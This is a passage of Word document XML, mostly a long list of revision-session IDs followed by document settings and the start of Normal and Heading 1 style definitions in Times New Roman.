    <w:rsid w:val="00C1573B"/>
    <w:rsid w:val="00C16065"/>
    <w:rsid w:val="00C16A8D"/>
    <w:rsid w:val="00C17104"/>
    <w:rsid w:val="00C174BB"/>
    <w:rsid w:val="00C17669"/>
    <w:rsid w:val="00C17E7C"/>
    <w:rsid w:val="00C20063"/>
    <w:rsid w:val="00C20971"/>
    <w:rsid w:val="00C20B0B"/>
    <w:rsid w:val="00C21EB0"/>
    <w:rsid w:val="00C224E5"/>
    <w:rsid w:val="00C226C0"/>
    <w:rsid w:val="00C2292E"/>
    <w:rsid w:val="00C22BFA"/>
    <w:rsid w:val="00C22E00"/>
    <w:rsid w:val="00C22E38"/>
    <w:rsid w:val="00C2336A"/>
    <w:rsid w:val="00C239DA"/>
    <w:rsid w:val="00C24532"/>
    <w:rsid w:val="00C26ADD"/>
    <w:rsid w:val="00C26BE3"/>
    <w:rsid w:val="00C26CAB"/>
    <w:rsid w:val="00C26E8E"/>
    <w:rsid w:val="00C273D8"/>
    <w:rsid w:val="00C302E7"/>
    <w:rsid w:val="00C32D54"/>
    <w:rsid w:val="00C33237"/>
    <w:rsid w:val="00C33359"/>
    <w:rsid w:val="00C34287"/>
    <w:rsid w:val="00C34340"/>
    <w:rsid w:val="00C347CC"/>
    <w:rsid w:val="00C348CE"/>
    <w:rsid w:val="00C34B97"/>
    <w:rsid w:val="00C34C8A"/>
    <w:rsid w:val="00C35732"/>
    <w:rsid w:val="00C35ADB"/>
    <w:rsid w:val="00C35D02"/>
    <w:rsid w:val="00C3696A"/>
    <w:rsid w:val="00C36FB2"/>
    <w:rsid w:val="00C400A3"/>
    <w:rsid w:val="00C4134A"/>
    <w:rsid w:val="00C43A76"/>
    <w:rsid w:val="00C44CDA"/>
    <w:rsid w:val="00C44ECF"/>
    <w:rsid w:val="00C459F7"/>
    <w:rsid w:val="00C472BE"/>
    <w:rsid w:val="00C47525"/>
    <w:rsid w:val="00C515E8"/>
    <w:rsid w:val="00C5213E"/>
    <w:rsid w:val="00C52E9B"/>
    <w:rsid w:val="00C5331E"/>
    <w:rsid w:val="00C53794"/>
    <w:rsid w:val="00C544D8"/>
    <w:rsid w:val="00C5464F"/>
    <w:rsid w:val="00C55973"/>
    <w:rsid w:val="00C56E51"/>
    <w:rsid w:val="00C57A7C"/>
    <w:rsid w:val="00C57ACB"/>
    <w:rsid w:val="00C57D06"/>
    <w:rsid w:val="00C60296"/>
    <w:rsid w:val="00C604EB"/>
    <w:rsid w:val="00C60662"/>
    <w:rsid w:val="00C61AD0"/>
    <w:rsid w:val="00C628D9"/>
    <w:rsid w:val="00C62A1D"/>
    <w:rsid w:val="00C63655"/>
    <w:rsid w:val="00C63953"/>
    <w:rsid w:val="00C63A5A"/>
    <w:rsid w:val="00C64892"/>
    <w:rsid w:val="00C64A2F"/>
    <w:rsid w:val="00C64E6D"/>
    <w:rsid w:val="00C6596E"/>
    <w:rsid w:val="00C65FB5"/>
    <w:rsid w:val="00C66150"/>
    <w:rsid w:val="00C67297"/>
    <w:rsid w:val="00C67B04"/>
    <w:rsid w:val="00C67D3F"/>
    <w:rsid w:val="00C70307"/>
    <w:rsid w:val="00C70944"/>
    <w:rsid w:val="00C72318"/>
    <w:rsid w:val="00C7368C"/>
    <w:rsid w:val="00C737FF"/>
    <w:rsid w:val="00C73B2E"/>
    <w:rsid w:val="00C749A8"/>
    <w:rsid w:val="00C77909"/>
    <w:rsid w:val="00C8111B"/>
    <w:rsid w:val="00C811BC"/>
    <w:rsid w:val="00C8294E"/>
    <w:rsid w:val="00C83B87"/>
    <w:rsid w:val="00C851ED"/>
    <w:rsid w:val="00C852E3"/>
    <w:rsid w:val="00C85FBC"/>
    <w:rsid w:val="00C869EE"/>
    <w:rsid w:val="00C87778"/>
    <w:rsid w:val="00C87A4B"/>
    <w:rsid w:val="00C87EF1"/>
    <w:rsid w:val="00C9009E"/>
    <w:rsid w:val="00C9056F"/>
    <w:rsid w:val="00C927A9"/>
    <w:rsid w:val="00C93126"/>
    <w:rsid w:val="00C933E5"/>
    <w:rsid w:val="00C945D3"/>
    <w:rsid w:val="00C94A44"/>
    <w:rsid w:val="00C94B4A"/>
    <w:rsid w:val="00C94FCC"/>
    <w:rsid w:val="00C951C9"/>
    <w:rsid w:val="00C95719"/>
    <w:rsid w:val="00C96394"/>
    <w:rsid w:val="00CA024B"/>
    <w:rsid w:val="00CA03C2"/>
    <w:rsid w:val="00CA0CC8"/>
    <w:rsid w:val="00CA0D56"/>
    <w:rsid w:val="00CA1296"/>
    <w:rsid w:val="00CA19A4"/>
    <w:rsid w:val="00CA2C51"/>
    <w:rsid w:val="00CA337E"/>
    <w:rsid w:val="00CA35FD"/>
    <w:rsid w:val="00CA3A1E"/>
    <w:rsid w:val="00CA4552"/>
    <w:rsid w:val="00CA57AC"/>
    <w:rsid w:val="00CA5F03"/>
    <w:rsid w:val="00CB15EA"/>
    <w:rsid w:val="00CB1E03"/>
    <w:rsid w:val="00CB30F7"/>
    <w:rsid w:val="00CB3989"/>
    <w:rsid w:val="00CB7729"/>
    <w:rsid w:val="00CB77F2"/>
    <w:rsid w:val="00CB7FE9"/>
    <w:rsid w:val="00CC0791"/>
    <w:rsid w:val="00CC127B"/>
    <w:rsid w:val="00CC15FF"/>
    <w:rsid w:val="00CC1869"/>
    <w:rsid w:val="00CC3012"/>
    <w:rsid w:val="00CC3845"/>
    <w:rsid w:val="00CC5827"/>
    <w:rsid w:val="00CC61B2"/>
    <w:rsid w:val="00CC655D"/>
    <w:rsid w:val="00CD0750"/>
    <w:rsid w:val="00CD317B"/>
    <w:rsid w:val="00CD3665"/>
    <w:rsid w:val="00CD3885"/>
    <w:rsid w:val="00CD3C50"/>
    <w:rsid w:val="00CD4D5E"/>
    <w:rsid w:val="00CD7DBB"/>
    <w:rsid w:val="00CD7FB1"/>
    <w:rsid w:val="00CE0414"/>
    <w:rsid w:val="00CE0829"/>
    <w:rsid w:val="00CE0C19"/>
    <w:rsid w:val="00CE11CD"/>
    <w:rsid w:val="00CE1A29"/>
    <w:rsid w:val="00CE3ADC"/>
    <w:rsid w:val="00CE4B66"/>
    <w:rsid w:val="00CE5A30"/>
    <w:rsid w:val="00CE5A7C"/>
    <w:rsid w:val="00CE5AEE"/>
    <w:rsid w:val="00CE75FB"/>
    <w:rsid w:val="00CE7FBC"/>
    <w:rsid w:val="00CF037C"/>
    <w:rsid w:val="00CF0E78"/>
    <w:rsid w:val="00CF299A"/>
    <w:rsid w:val="00CF3E01"/>
    <w:rsid w:val="00CF4731"/>
    <w:rsid w:val="00CF5EE9"/>
    <w:rsid w:val="00CF6035"/>
    <w:rsid w:val="00CF60CE"/>
    <w:rsid w:val="00CF6E1A"/>
    <w:rsid w:val="00CF751A"/>
    <w:rsid w:val="00D006EC"/>
    <w:rsid w:val="00D01871"/>
    <w:rsid w:val="00D01A44"/>
    <w:rsid w:val="00D01C7B"/>
    <w:rsid w:val="00D027F2"/>
    <w:rsid w:val="00D0430E"/>
    <w:rsid w:val="00D0545E"/>
    <w:rsid w:val="00D05A97"/>
    <w:rsid w:val="00D062C5"/>
    <w:rsid w:val="00D06719"/>
    <w:rsid w:val="00D070EA"/>
    <w:rsid w:val="00D101EB"/>
    <w:rsid w:val="00D1069F"/>
    <w:rsid w:val="00D12708"/>
    <w:rsid w:val="00D132BA"/>
    <w:rsid w:val="00D15AB4"/>
    <w:rsid w:val="00D17FB8"/>
    <w:rsid w:val="00D206CC"/>
    <w:rsid w:val="00D2200E"/>
    <w:rsid w:val="00D23CC9"/>
    <w:rsid w:val="00D24012"/>
    <w:rsid w:val="00D24506"/>
    <w:rsid w:val="00D24834"/>
    <w:rsid w:val="00D25B82"/>
    <w:rsid w:val="00D25BCB"/>
    <w:rsid w:val="00D27402"/>
    <w:rsid w:val="00D30184"/>
    <w:rsid w:val="00D3129E"/>
    <w:rsid w:val="00D31EE8"/>
    <w:rsid w:val="00D32643"/>
    <w:rsid w:val="00D32693"/>
    <w:rsid w:val="00D3281C"/>
    <w:rsid w:val="00D32FD1"/>
    <w:rsid w:val="00D34E30"/>
    <w:rsid w:val="00D352EA"/>
    <w:rsid w:val="00D356E3"/>
    <w:rsid w:val="00D364E2"/>
    <w:rsid w:val="00D37CF8"/>
    <w:rsid w:val="00D40C3F"/>
    <w:rsid w:val="00D4223C"/>
    <w:rsid w:val="00D42DFF"/>
    <w:rsid w:val="00D43A1E"/>
    <w:rsid w:val="00D44B05"/>
    <w:rsid w:val="00D453E2"/>
    <w:rsid w:val="00D455E8"/>
    <w:rsid w:val="00D45794"/>
    <w:rsid w:val="00D45988"/>
    <w:rsid w:val="00D4668B"/>
    <w:rsid w:val="00D5034C"/>
    <w:rsid w:val="00D507FF"/>
    <w:rsid w:val="00D50919"/>
    <w:rsid w:val="00D50DC3"/>
    <w:rsid w:val="00D513E1"/>
    <w:rsid w:val="00D52EDD"/>
    <w:rsid w:val="00D52FA5"/>
    <w:rsid w:val="00D53040"/>
    <w:rsid w:val="00D530A5"/>
    <w:rsid w:val="00D53308"/>
    <w:rsid w:val="00D547B4"/>
    <w:rsid w:val="00D54E61"/>
    <w:rsid w:val="00D5548C"/>
    <w:rsid w:val="00D560A6"/>
    <w:rsid w:val="00D566DA"/>
    <w:rsid w:val="00D60504"/>
    <w:rsid w:val="00D60B1C"/>
    <w:rsid w:val="00D60CFA"/>
    <w:rsid w:val="00D61BBC"/>
    <w:rsid w:val="00D6534B"/>
    <w:rsid w:val="00D67C4A"/>
    <w:rsid w:val="00D70121"/>
    <w:rsid w:val="00D713AD"/>
    <w:rsid w:val="00D71DD6"/>
    <w:rsid w:val="00D7279F"/>
    <w:rsid w:val="00D72FB9"/>
    <w:rsid w:val="00D73519"/>
    <w:rsid w:val="00D74385"/>
    <w:rsid w:val="00D7484D"/>
    <w:rsid w:val="00D76214"/>
    <w:rsid w:val="00D76482"/>
    <w:rsid w:val="00D76512"/>
    <w:rsid w:val="00D76DDD"/>
    <w:rsid w:val="00D77CE1"/>
    <w:rsid w:val="00D77E8A"/>
    <w:rsid w:val="00D77E92"/>
    <w:rsid w:val="00D8125E"/>
    <w:rsid w:val="00D81673"/>
    <w:rsid w:val="00D81E02"/>
    <w:rsid w:val="00D8329C"/>
    <w:rsid w:val="00D833B3"/>
    <w:rsid w:val="00D834A2"/>
    <w:rsid w:val="00D83BEF"/>
    <w:rsid w:val="00D84271"/>
    <w:rsid w:val="00D85A8A"/>
    <w:rsid w:val="00D86443"/>
    <w:rsid w:val="00D8648A"/>
    <w:rsid w:val="00D869D4"/>
    <w:rsid w:val="00D900F7"/>
    <w:rsid w:val="00D90B84"/>
    <w:rsid w:val="00D91C56"/>
    <w:rsid w:val="00D92A21"/>
    <w:rsid w:val="00D92A69"/>
    <w:rsid w:val="00D93C25"/>
    <w:rsid w:val="00D94016"/>
    <w:rsid w:val="00D94996"/>
    <w:rsid w:val="00D961FC"/>
    <w:rsid w:val="00D96E15"/>
    <w:rsid w:val="00D97BCE"/>
    <w:rsid w:val="00DA15C8"/>
    <w:rsid w:val="00DA1F73"/>
    <w:rsid w:val="00DA2280"/>
    <w:rsid w:val="00DA251D"/>
    <w:rsid w:val="00DA2655"/>
    <w:rsid w:val="00DA34C0"/>
    <w:rsid w:val="00DA5383"/>
    <w:rsid w:val="00DA57A5"/>
    <w:rsid w:val="00DA6FB4"/>
    <w:rsid w:val="00DA77EB"/>
    <w:rsid w:val="00DA7A08"/>
    <w:rsid w:val="00DA7ACE"/>
    <w:rsid w:val="00DB0EEC"/>
    <w:rsid w:val="00DB66CB"/>
    <w:rsid w:val="00DB66F6"/>
    <w:rsid w:val="00DB6B12"/>
    <w:rsid w:val="00DB6BDE"/>
    <w:rsid w:val="00DB6ED0"/>
    <w:rsid w:val="00DB6F76"/>
    <w:rsid w:val="00DB77D1"/>
    <w:rsid w:val="00DB7913"/>
    <w:rsid w:val="00DC0161"/>
    <w:rsid w:val="00DC0897"/>
    <w:rsid w:val="00DC190B"/>
    <w:rsid w:val="00DC1CD6"/>
    <w:rsid w:val="00DC20A8"/>
    <w:rsid w:val="00DC23AF"/>
    <w:rsid w:val="00DC2AAC"/>
    <w:rsid w:val="00DC2F22"/>
    <w:rsid w:val="00DC3524"/>
    <w:rsid w:val="00DC48D2"/>
    <w:rsid w:val="00DC4A4A"/>
    <w:rsid w:val="00DC4AB9"/>
    <w:rsid w:val="00DC53CB"/>
    <w:rsid w:val="00DC543F"/>
    <w:rsid w:val="00DC5EAE"/>
    <w:rsid w:val="00DC6392"/>
    <w:rsid w:val="00DC6DDA"/>
    <w:rsid w:val="00DC6E77"/>
    <w:rsid w:val="00DC769B"/>
    <w:rsid w:val="00DC7CC9"/>
    <w:rsid w:val="00DD00D3"/>
    <w:rsid w:val="00DD01ED"/>
    <w:rsid w:val="00DD0317"/>
    <w:rsid w:val="00DD0804"/>
    <w:rsid w:val="00DD0EE8"/>
    <w:rsid w:val="00DD18C2"/>
    <w:rsid w:val="00DD2CA7"/>
    <w:rsid w:val="00DD451E"/>
    <w:rsid w:val="00DD4FA4"/>
    <w:rsid w:val="00DD5231"/>
    <w:rsid w:val="00DD577D"/>
    <w:rsid w:val="00DD7557"/>
    <w:rsid w:val="00DD77F1"/>
    <w:rsid w:val="00DE046F"/>
    <w:rsid w:val="00DE090D"/>
    <w:rsid w:val="00DE11C8"/>
    <w:rsid w:val="00DE1B98"/>
    <w:rsid w:val="00DE3E71"/>
    <w:rsid w:val="00DE4AFF"/>
    <w:rsid w:val="00DE4CAB"/>
    <w:rsid w:val="00DE4F88"/>
    <w:rsid w:val="00DE5AAA"/>
    <w:rsid w:val="00DE6655"/>
    <w:rsid w:val="00DE6993"/>
    <w:rsid w:val="00DE7858"/>
    <w:rsid w:val="00DE7882"/>
    <w:rsid w:val="00DF037F"/>
    <w:rsid w:val="00DF05DD"/>
    <w:rsid w:val="00DF151F"/>
    <w:rsid w:val="00DF5201"/>
    <w:rsid w:val="00DF52CB"/>
    <w:rsid w:val="00DF5A66"/>
    <w:rsid w:val="00DF5C65"/>
    <w:rsid w:val="00E00402"/>
    <w:rsid w:val="00E006BC"/>
    <w:rsid w:val="00E01F1B"/>
    <w:rsid w:val="00E0228D"/>
    <w:rsid w:val="00E04E5C"/>
    <w:rsid w:val="00E05543"/>
    <w:rsid w:val="00E056B6"/>
    <w:rsid w:val="00E06217"/>
    <w:rsid w:val="00E07166"/>
    <w:rsid w:val="00E07CCB"/>
    <w:rsid w:val="00E135E8"/>
    <w:rsid w:val="00E1603A"/>
    <w:rsid w:val="00E17B8B"/>
    <w:rsid w:val="00E17F77"/>
    <w:rsid w:val="00E20424"/>
    <w:rsid w:val="00E2099A"/>
    <w:rsid w:val="00E21027"/>
    <w:rsid w:val="00E217AA"/>
    <w:rsid w:val="00E21F5D"/>
    <w:rsid w:val="00E21FE4"/>
    <w:rsid w:val="00E2378F"/>
    <w:rsid w:val="00E25848"/>
    <w:rsid w:val="00E258F6"/>
    <w:rsid w:val="00E260F2"/>
    <w:rsid w:val="00E2670E"/>
    <w:rsid w:val="00E27AF9"/>
    <w:rsid w:val="00E27CC7"/>
    <w:rsid w:val="00E27EDD"/>
    <w:rsid w:val="00E306F4"/>
    <w:rsid w:val="00E31BE8"/>
    <w:rsid w:val="00E31EA2"/>
    <w:rsid w:val="00E33157"/>
    <w:rsid w:val="00E33C6D"/>
    <w:rsid w:val="00E33FE8"/>
    <w:rsid w:val="00E34954"/>
    <w:rsid w:val="00E34D18"/>
    <w:rsid w:val="00E350EA"/>
    <w:rsid w:val="00E35B17"/>
    <w:rsid w:val="00E36B66"/>
    <w:rsid w:val="00E41E0F"/>
    <w:rsid w:val="00E42037"/>
    <w:rsid w:val="00E42A78"/>
    <w:rsid w:val="00E430F3"/>
    <w:rsid w:val="00E44D9E"/>
    <w:rsid w:val="00E45611"/>
    <w:rsid w:val="00E4689F"/>
    <w:rsid w:val="00E46B69"/>
    <w:rsid w:val="00E50571"/>
    <w:rsid w:val="00E517A3"/>
    <w:rsid w:val="00E517BA"/>
    <w:rsid w:val="00E517C9"/>
    <w:rsid w:val="00E51EA4"/>
    <w:rsid w:val="00E51EE9"/>
    <w:rsid w:val="00E53D41"/>
    <w:rsid w:val="00E54384"/>
    <w:rsid w:val="00E552A0"/>
    <w:rsid w:val="00E562B0"/>
    <w:rsid w:val="00E56604"/>
    <w:rsid w:val="00E57830"/>
    <w:rsid w:val="00E608BD"/>
    <w:rsid w:val="00E61AE0"/>
    <w:rsid w:val="00E621BC"/>
    <w:rsid w:val="00E62A91"/>
    <w:rsid w:val="00E64643"/>
    <w:rsid w:val="00E660F6"/>
    <w:rsid w:val="00E67732"/>
    <w:rsid w:val="00E71271"/>
    <w:rsid w:val="00E71A00"/>
    <w:rsid w:val="00E71F82"/>
    <w:rsid w:val="00E721BE"/>
    <w:rsid w:val="00E7220E"/>
    <w:rsid w:val="00E73726"/>
    <w:rsid w:val="00E7467B"/>
    <w:rsid w:val="00E75133"/>
    <w:rsid w:val="00E75D7A"/>
    <w:rsid w:val="00E76023"/>
    <w:rsid w:val="00E777F2"/>
    <w:rsid w:val="00E80273"/>
    <w:rsid w:val="00E81B0D"/>
    <w:rsid w:val="00E84DEE"/>
    <w:rsid w:val="00E852D4"/>
    <w:rsid w:val="00E85643"/>
    <w:rsid w:val="00E85E61"/>
    <w:rsid w:val="00E85FBC"/>
    <w:rsid w:val="00E868B8"/>
    <w:rsid w:val="00E868F1"/>
    <w:rsid w:val="00E869D3"/>
    <w:rsid w:val="00E86E96"/>
    <w:rsid w:val="00E873C5"/>
    <w:rsid w:val="00E90830"/>
    <w:rsid w:val="00E90D75"/>
    <w:rsid w:val="00E90E39"/>
    <w:rsid w:val="00E914EE"/>
    <w:rsid w:val="00E9278F"/>
    <w:rsid w:val="00E959CE"/>
    <w:rsid w:val="00E968F0"/>
    <w:rsid w:val="00E97912"/>
    <w:rsid w:val="00EA00D2"/>
    <w:rsid w:val="00EA3107"/>
    <w:rsid w:val="00EA3270"/>
    <w:rsid w:val="00EA3A15"/>
    <w:rsid w:val="00EA3A96"/>
    <w:rsid w:val="00EA54A4"/>
    <w:rsid w:val="00EA6585"/>
    <w:rsid w:val="00EA6F32"/>
    <w:rsid w:val="00EA7901"/>
    <w:rsid w:val="00EA7D9B"/>
    <w:rsid w:val="00EB1076"/>
    <w:rsid w:val="00EB1411"/>
    <w:rsid w:val="00EB142E"/>
    <w:rsid w:val="00EB206D"/>
    <w:rsid w:val="00EB2E62"/>
    <w:rsid w:val="00EB2E98"/>
    <w:rsid w:val="00EB31AB"/>
    <w:rsid w:val="00EB31C6"/>
    <w:rsid w:val="00EB3BE1"/>
    <w:rsid w:val="00EB4540"/>
    <w:rsid w:val="00EB4599"/>
    <w:rsid w:val="00EB656F"/>
    <w:rsid w:val="00EB69B9"/>
    <w:rsid w:val="00EB7086"/>
    <w:rsid w:val="00EB713F"/>
    <w:rsid w:val="00EB7F14"/>
    <w:rsid w:val="00EC04BB"/>
    <w:rsid w:val="00EC0F22"/>
    <w:rsid w:val="00EC1A02"/>
    <w:rsid w:val="00EC200E"/>
    <w:rsid w:val="00EC20A4"/>
    <w:rsid w:val="00EC41FE"/>
    <w:rsid w:val="00EC4807"/>
    <w:rsid w:val="00EC51CF"/>
    <w:rsid w:val="00EC64C4"/>
    <w:rsid w:val="00EC692B"/>
    <w:rsid w:val="00EC76CF"/>
    <w:rsid w:val="00EC7C93"/>
    <w:rsid w:val="00ED013A"/>
    <w:rsid w:val="00ED0A72"/>
    <w:rsid w:val="00ED12CC"/>
    <w:rsid w:val="00ED27B5"/>
    <w:rsid w:val="00ED2B20"/>
    <w:rsid w:val="00ED2B72"/>
    <w:rsid w:val="00ED3025"/>
    <w:rsid w:val="00ED30F3"/>
    <w:rsid w:val="00ED313D"/>
    <w:rsid w:val="00ED382C"/>
    <w:rsid w:val="00ED42E2"/>
    <w:rsid w:val="00ED47B0"/>
    <w:rsid w:val="00ED4EBA"/>
    <w:rsid w:val="00ED5558"/>
    <w:rsid w:val="00ED601C"/>
    <w:rsid w:val="00ED6238"/>
    <w:rsid w:val="00ED66EB"/>
    <w:rsid w:val="00ED70EF"/>
    <w:rsid w:val="00ED73F6"/>
    <w:rsid w:val="00ED7A31"/>
    <w:rsid w:val="00EE1AD4"/>
    <w:rsid w:val="00EE1CF7"/>
    <w:rsid w:val="00EE3072"/>
    <w:rsid w:val="00EE36B9"/>
    <w:rsid w:val="00EE3982"/>
    <w:rsid w:val="00EE45CB"/>
    <w:rsid w:val="00EE5938"/>
    <w:rsid w:val="00EE59B3"/>
    <w:rsid w:val="00EE5F65"/>
    <w:rsid w:val="00EE68B6"/>
    <w:rsid w:val="00EE7A59"/>
    <w:rsid w:val="00EF020C"/>
    <w:rsid w:val="00EF059E"/>
    <w:rsid w:val="00EF081F"/>
    <w:rsid w:val="00EF220B"/>
    <w:rsid w:val="00EF2BF9"/>
    <w:rsid w:val="00EF32D1"/>
    <w:rsid w:val="00EF3B8B"/>
    <w:rsid w:val="00EF458A"/>
    <w:rsid w:val="00EF5A58"/>
    <w:rsid w:val="00EF5DDF"/>
    <w:rsid w:val="00EF603F"/>
    <w:rsid w:val="00EF6A4F"/>
    <w:rsid w:val="00EF6E3A"/>
    <w:rsid w:val="00EF7407"/>
    <w:rsid w:val="00F00790"/>
    <w:rsid w:val="00F02313"/>
    <w:rsid w:val="00F04C81"/>
    <w:rsid w:val="00F060A0"/>
    <w:rsid w:val="00F062DF"/>
    <w:rsid w:val="00F06493"/>
    <w:rsid w:val="00F06571"/>
    <w:rsid w:val="00F07AEC"/>
    <w:rsid w:val="00F07C02"/>
    <w:rsid w:val="00F102B6"/>
    <w:rsid w:val="00F110A0"/>
    <w:rsid w:val="00F110EC"/>
    <w:rsid w:val="00F1200C"/>
    <w:rsid w:val="00F12AA8"/>
    <w:rsid w:val="00F135BC"/>
    <w:rsid w:val="00F13DC1"/>
    <w:rsid w:val="00F143E5"/>
    <w:rsid w:val="00F14C71"/>
    <w:rsid w:val="00F1685D"/>
    <w:rsid w:val="00F16D9C"/>
    <w:rsid w:val="00F20CB9"/>
    <w:rsid w:val="00F22327"/>
    <w:rsid w:val="00F22614"/>
    <w:rsid w:val="00F26D73"/>
    <w:rsid w:val="00F27378"/>
    <w:rsid w:val="00F276D7"/>
    <w:rsid w:val="00F300C8"/>
    <w:rsid w:val="00F300EC"/>
    <w:rsid w:val="00F30B17"/>
    <w:rsid w:val="00F32249"/>
    <w:rsid w:val="00F32FEE"/>
    <w:rsid w:val="00F3368A"/>
    <w:rsid w:val="00F34B4D"/>
    <w:rsid w:val="00F36086"/>
    <w:rsid w:val="00F369FA"/>
    <w:rsid w:val="00F36E14"/>
    <w:rsid w:val="00F36F0D"/>
    <w:rsid w:val="00F36FFA"/>
    <w:rsid w:val="00F400A2"/>
    <w:rsid w:val="00F4101E"/>
    <w:rsid w:val="00F42677"/>
    <w:rsid w:val="00F42872"/>
    <w:rsid w:val="00F42D15"/>
    <w:rsid w:val="00F42FAB"/>
    <w:rsid w:val="00F43627"/>
    <w:rsid w:val="00F4367F"/>
    <w:rsid w:val="00F43EC2"/>
    <w:rsid w:val="00F44446"/>
    <w:rsid w:val="00F44AC8"/>
    <w:rsid w:val="00F4545D"/>
    <w:rsid w:val="00F4605A"/>
    <w:rsid w:val="00F50007"/>
    <w:rsid w:val="00F517BC"/>
    <w:rsid w:val="00F52ADD"/>
    <w:rsid w:val="00F52C04"/>
    <w:rsid w:val="00F53E67"/>
    <w:rsid w:val="00F54152"/>
    <w:rsid w:val="00F545C6"/>
    <w:rsid w:val="00F54EE6"/>
    <w:rsid w:val="00F54F53"/>
    <w:rsid w:val="00F5511D"/>
    <w:rsid w:val="00F55F68"/>
    <w:rsid w:val="00F566A7"/>
    <w:rsid w:val="00F571E6"/>
    <w:rsid w:val="00F6076E"/>
    <w:rsid w:val="00F60C90"/>
    <w:rsid w:val="00F60FAC"/>
    <w:rsid w:val="00F615ED"/>
    <w:rsid w:val="00F6201B"/>
    <w:rsid w:val="00F62196"/>
    <w:rsid w:val="00F637D6"/>
    <w:rsid w:val="00F64AEB"/>
    <w:rsid w:val="00F64F0E"/>
    <w:rsid w:val="00F653D8"/>
    <w:rsid w:val="00F65892"/>
    <w:rsid w:val="00F672D6"/>
    <w:rsid w:val="00F7001A"/>
    <w:rsid w:val="00F70621"/>
    <w:rsid w:val="00F70A37"/>
    <w:rsid w:val="00F712CA"/>
    <w:rsid w:val="00F71554"/>
    <w:rsid w:val="00F71557"/>
    <w:rsid w:val="00F7163F"/>
    <w:rsid w:val="00F71D30"/>
    <w:rsid w:val="00F72AC4"/>
    <w:rsid w:val="00F736C0"/>
    <w:rsid w:val="00F74546"/>
    <w:rsid w:val="00F74A19"/>
    <w:rsid w:val="00F75035"/>
    <w:rsid w:val="00F75D09"/>
    <w:rsid w:val="00F76863"/>
    <w:rsid w:val="00F77581"/>
    <w:rsid w:val="00F77ECE"/>
    <w:rsid w:val="00F81EB8"/>
    <w:rsid w:val="00F82BEC"/>
    <w:rsid w:val="00F82D4F"/>
    <w:rsid w:val="00F84D3B"/>
    <w:rsid w:val="00F84E17"/>
    <w:rsid w:val="00F87036"/>
    <w:rsid w:val="00F87C2C"/>
    <w:rsid w:val="00F90575"/>
    <w:rsid w:val="00F90CC9"/>
    <w:rsid w:val="00F90E84"/>
    <w:rsid w:val="00F914C4"/>
    <w:rsid w:val="00F91B31"/>
    <w:rsid w:val="00F91EAD"/>
    <w:rsid w:val="00F92186"/>
    <w:rsid w:val="00F92DE0"/>
    <w:rsid w:val="00F937B8"/>
    <w:rsid w:val="00F93971"/>
    <w:rsid w:val="00F95B54"/>
    <w:rsid w:val="00F95B7D"/>
    <w:rsid w:val="00F95DDD"/>
    <w:rsid w:val="00F96E47"/>
    <w:rsid w:val="00F974AE"/>
    <w:rsid w:val="00F975CA"/>
    <w:rsid w:val="00FA1223"/>
    <w:rsid w:val="00FA1882"/>
    <w:rsid w:val="00FA1EFB"/>
    <w:rsid w:val="00FA3A2C"/>
    <w:rsid w:val="00FA4B15"/>
    <w:rsid w:val="00FA6098"/>
    <w:rsid w:val="00FA6812"/>
    <w:rsid w:val="00FA7318"/>
    <w:rsid w:val="00FB021F"/>
    <w:rsid w:val="00FB2657"/>
    <w:rsid w:val="00FB35E0"/>
    <w:rsid w:val="00FB3B5F"/>
    <w:rsid w:val="00FB4B00"/>
    <w:rsid w:val="00FB54DC"/>
    <w:rsid w:val="00FB5757"/>
    <w:rsid w:val="00FB5922"/>
    <w:rsid w:val="00FB67D0"/>
    <w:rsid w:val="00FB6982"/>
    <w:rsid w:val="00FB6FCF"/>
    <w:rsid w:val="00FB76A1"/>
    <w:rsid w:val="00FC18AA"/>
    <w:rsid w:val="00FC255F"/>
    <w:rsid w:val="00FC2C23"/>
    <w:rsid w:val="00FC36D1"/>
    <w:rsid w:val="00FC3E56"/>
    <w:rsid w:val="00FC428C"/>
    <w:rsid w:val="00FC59E6"/>
    <w:rsid w:val="00FD01B8"/>
    <w:rsid w:val="00FD0C9D"/>
    <w:rsid w:val="00FD0D6C"/>
    <w:rsid w:val="00FD0E6C"/>
    <w:rsid w:val="00FD3A50"/>
    <w:rsid w:val="00FD46CB"/>
    <w:rsid w:val="00FD5713"/>
    <w:rsid w:val="00FD59A7"/>
    <w:rsid w:val="00FD747B"/>
    <w:rsid w:val="00FD7885"/>
    <w:rsid w:val="00FD7ADF"/>
    <w:rsid w:val="00FD7B2A"/>
    <w:rsid w:val="00FE0183"/>
    <w:rsid w:val="00FE08BE"/>
    <w:rsid w:val="00FE0D7D"/>
    <w:rsid w:val="00FE2FB7"/>
    <w:rsid w:val="00FE3540"/>
    <w:rsid w:val="00FE394B"/>
    <w:rsid w:val="00FE3E7F"/>
    <w:rsid w:val="00FE4558"/>
    <w:rsid w:val="00FE568B"/>
    <w:rsid w:val="00FE58AA"/>
    <w:rsid w:val="00FE7107"/>
    <w:rsid w:val="00FE737D"/>
    <w:rsid w:val="00FE7BF7"/>
    <w:rsid w:val="00FF11AD"/>
    <w:rsid w:val="00FF19AB"/>
    <w:rsid w:val="00FF1A60"/>
    <w:rsid w:val="00FF1F48"/>
    <w:rsid w:val="00FF20DE"/>
    <w:rsid w:val="00FF2D9E"/>
    <w:rsid w:val="00FF31B8"/>
    <w:rsid w:val="00FF36B3"/>
    <w:rsid w:val="00FF380C"/>
    <w:rsid w:val="00FF41E6"/>
    <w:rsid w:val="00FF475B"/>
    <w:rsid w:val="00FF4C6E"/>
    <w:rsid w:val="00FF4D63"/>
    <w:rsid w:val="00FF5DE6"/>
    <w:rsid w:val="00FF6283"/>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BEE78"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EECA07AD-A035-4D7A-B091-45AA31DB3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lt-LT" w:eastAsia="lt-LT"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4BFC"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00FB4B00"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
